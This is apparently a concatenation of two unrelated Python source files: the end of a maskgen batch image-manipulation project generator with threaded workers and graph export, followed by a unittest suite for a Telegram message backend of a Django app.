op.performOp()
local_state['model'].renameFileImages()
if 'archives' in global_state:
local_state['model'].export(global_state['archives'])
except Exception as e:
project_name = local_state['model'].getName() if 'model' in local_state else 'NA'
logging.getLogger('maskgen').error('Creation of project {} failed: {}'.format(project_name, str(e)))
if 'model' in local_state:
shutil.rmtree(local_state['model'].get_dir())
return None
return local_state['model'].get_dir()
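# Reading of executeForProject/executeOnce (added comment): nodes are visited
# breadth-first from the base node; a node runs only once all of its predecessors
# have completed, and InputMaskPluginOperation predecessors are excluded when
# picking the node that the newly created edge connects from.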
def dump(self, global_state):
filename = working_abs_file(global_state,self.getName() + '.png')
self._draw().write_png(filename)
filename = self.getName() + '.csv'
position = 0
with open(filename,'w') as f:
for node in self.json_data['nodes']:
f.write(node['id'] + ',' + str(position) + '\n')
position += 1
colors_bytype ={ 'InputMaskPluginOperation' : 'blue'}
def _draw(self):
import pydot
pydot_nodes = {}
pygraph = pydot.Dot(graph_type='digraph')
for node_id in self.G.nodes():
node = self.G.node[node_id]
name = op_type = node['op_type']
if op_type in ['PluginOperation','InputMaskPluginOperation']:
name = node['plugin']
color = self.colors_bytype[op_type] if op_type in self.colors_bytype else 'black'
pydot_nodes[node_id] = pydot.Node(node_id, label=name,
shape='plain',
color=color)
pygraph.add_node(pydot_nodes[node_id])
for edge_id in self.G.edges():
node = self.G.node[edge_id[0]]
op_type = node['op_type']
color = self.colors_bytype[op_type] if op_type in self.colors_bytype else 'black'
pygraph.add_edge(
pydot.Edge(pydot_nodes[edge_id[0]], pydot_nodes[edge_id[1]], color=color))
return pygraph
def validate(self):
"""
Return list of error strings
:return:
@rtype : List[str]
"""
errors = []
topcount = 0
for top in self._findTops():
top_node = self.G.node[top]
if top_node['op_type'] == 'BaseSelection':
topcount += 1
if topcount > 1:
errors.append("More than one BaseSelection node")
if topcount == 0:
errors.append("Missing one BaseSelection node")
def loadPermuteGroups(self,global_state):
permuteGroupManager = global_state['permutegroupsmanager']
for node_name in self.G.nodes():
node = self.G.node[node_name]
if 'arguments' in node:
for name,spec in node['arguments'].iteritems():
if 'permutegroup' in spec and spec['type'] != 'variable':
permuteGroupManager.loadParameter(spec['permutegroup'],
buildIterator( node_name + '.' + name,spec,global_state))
if 'op_type' in node and node['op_type'] in ['BaseSelection','ImageSelection']:
permutegroup = node['permutegroup'] if 'permutegroup' in node else None
permuteGroupManager.loadParameter(permutegroup,
pickImageIterator(node,
node_name,
global_state))
def _findTops(self):
"""
Find and return the names of all top-level nodes (nodes without predecessors)
:return:
@rtype: List[str]
"""
return [node for node in self.G.nodes() if len(self.G.predecessors(node)) == 0]
def _findBase(self):
"""
Find and return the name of the base node: a top node whose op_type is BaseSelection or NodeAttachment
:return:
@rtype: str
"""
tops = self._findTops()
for top in tops:
top_node = self.G.node[top]
if top_node['op_type'] in ['BaseSelection' , 'NodeAttachment']:
return top
return None
def _execute_node(self, node_name,connect_to_node_name,local_state, global_state):
"""
:param local_state:
:param global_state:
:return:
@rtype: maskgen.scenario_model.ImageProjectModel
"""
try:
self.logger.debug('_execute_node ' + node_name + ' connect to ' + str (connect_to_node_name))
return getOperationGivenDescriptor(self.G.node[node_name]).execute(self.G, node_name,self.G.node[node_name],\
connect_to_node_name, local_state = local_state, global_state=global_state)
except Exception as e:
logging.getLogger('maskgen').error(str(e))
raise e
def getBatch(jsonFile,loglevel=50):
"""
:param jsonFile:
:return:
@return BatchProject
"""
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=FORMAT,level=50 if loglevel is None else int(loglevel))
return loadJSONGraph(jsonFile)
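# Usage sketch (illustrative; the file name is hypothetical):
#   batch = getBatch('specs/demo_batch.json', loglevel=20)
#   errors = batch.validate()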
threadGlobalState = {}
def thread_worker(**kwargs):
#import copy
global threadGlobalState
globalState = threadGlobalState
count = globalState['count']
permutegroupsmanager = globalState['permutegroupsmanager']
if count is not None:
logging.getLogger('maskgen').info(
'Starting worker thread {}. Current count is {}'.format(currentThread().getName(), count.value))
while ((count and count.decrement() > 0) or (count is None and permutegroupsmanager.hasNext())):
try:
project_directory = globalState['project'].executeOnce(globalState)
if project_directory is not None:
logging.getLogger('maskgen').info( 'Thread {} Completed {}'.format(currentThread().getName (),
project_directory))
else:
logging.getLogger('maskgen').error(
'Exiting thread {} due to failure to create project'.format(currentThread().getName()))
break
except Exception as e:
logging.getLogger('maskgen').info('Completed thread: ' + str(e))
def main():
global threadGlobalState
parser = argparse.ArgumentParser()
parser.add_argument('--json', required=True, help='JSON File')
parser.add_argument('--count', required=False, help='number of projects to build')
parser.add_argument('--threads', required=False, help='number of projects to build')
parser.add_argument('--workdir',required=False,help='directory to maintain and look for lock list, logging and permutation files')
parser.add_argument('--results', required=True, help='project results directory')
parser.add_argument('--loglevel', required=False, help='log level')
parser.add_argument('--graph', required=False, action='store_true',help='create graph PNG file')
parser.add_argument('--COCO_flag', required=False, action='store_true', help='whether to use COCO dataset.')
parser.add_argument("--COCO_Dir", nargs='?', type=str, default = '/dvmm-filer2/users/xuzhang/Medifor/data/MSCOCO/'
,help="Directory of MS COCO dataset.")
args = parser.parse_args()
if not os.path.exists(args.results) or not os.path.isdir(args.results):
logging.getLogger('maskgen').error( 'invalid directory for results: ' + args.results)
return
loadCustomFunctions()
batchProject =getBatch(args.json, loglevel=args.loglevel)
picklists_files = {}
workdir = '.' if args.workdir is None or not os.path.exists(args.workdir) else args.workdir
set_logging(workdir)
threadGlobalState = {'projects': args.results,
'picklists_files': picklists_files,
'project': batchProject,
'workdir': workdir,
'count': IntObject(int(args.count)) if args.count else None,
'permutegroupsmanager' : PermuteGroupManager(dir=workdir),
'picklistlock' : Lock()
}
batchProject.loadPermuteGroups(threadGlobalState)
global COCO_flag
COCO_flag = args.COCO_flag
if COCO_flag:
dataDir = args.COCO_Dir
global coco
annFile='%s/annotations/instances_%s.json'%(dataDir,dataType)
coco = COCO(annFile)
global imgIds
imgIds = coco.getImgIds()
if args.graph:
batchProject.dump(threadGlobalState)
threads_count = args.threads if args.threads else 1
threads = []
name = 1
for i in range(int(threads_count)):
name += 1
t = Thread(target=thread_worker,name=str(name))
threads.append(t)
t.start()
for thread in threads:
thread.join()
for k, fp in picklists_files.iteritems():
fp.close()
if __name__ == '__main__':
main()
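# Example invocation (all paths and counts are placeholders):
#   python batch_project.py --json specs/demo_batch.json --results ./projects \
#       --threads 4 --count 20 --workdir ./work --graph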
|
test_service.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from tests.factories import UpdateFactory
import threading
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
ROOT_URLCONF="listenclosely.urls",
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"listenclosely_telegram",
],
SITE_ID=1,
MIDDLEWARE_CLASSES=(),
LISTENCLOSELY_TELEGRAM_BOT_TOKEN="token",
)
try:
import django
setup = django.setup
except AttributeError:
pass
else:
setup()
try:
from unittest import mock
except ImportError:
import mock # noqa
class TestService(unittest.TestCase):
def setUp(self):
self.caller = mock.MagicMock()
from listenclosely_telegram.service import TelegramMessageServiceBackend
self.service = TelegramMessageServiceBackend(self.caller)
def _queue_thread(self, fn, *args, **kwargs):
while not self.service.bot.listening:
pass
if fn:
fn(*args, **kwargs)
def _listen(self, asyn_action, timeout=0.3):
self.input_thread = threading.Thread(target=self._queue_thread, args=(asyn_action,))
self.input_thread.daemon = True
self.input_thread.start()
self.service.listen()
self.assertFalse(self.service.bot.listening)
def _disconnect(self):
self.assertTrue(self.service.bot.listening)
self.service.disconnect()
def test_caller_assigned(self):
self.assertEqual(self.service.caller, self.caller)
def test_disconnect(self):
self.updates = [UpdateFactory()]
with mock.patch('twx.botapi.TelegramBot.get_updates', callable=mock.MagicMock()) as mock_get_updates:
mock_get_updates.return_value.wait = mock.MagicMock(return_value=self.updates)
self._listen(self._disconnect)
def test_offset(self):
self.updates = [UpdateFactory()]
with mock.patch('twx.botapi.TelegramBot.get_updates', callable=mock.MagicMock()) as mock_get_updates:
mock_get_updates.return_value.wait = mock.MagicMock(return_value=self.updates)
self._listen(self._disconnect)
self.assertEqual(self.service.bot.offset-1, self.updates[0].update_id)
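# Note (reading of the tests above): twx.botapi.TelegramBot.get_updates is patched to
# return a fabricated update; _queue_thread spins until bot.listening is set and then
# calls disconnect() from a daemon thread, which lets listen() return so the
# assertions can run on the main thread.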
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
|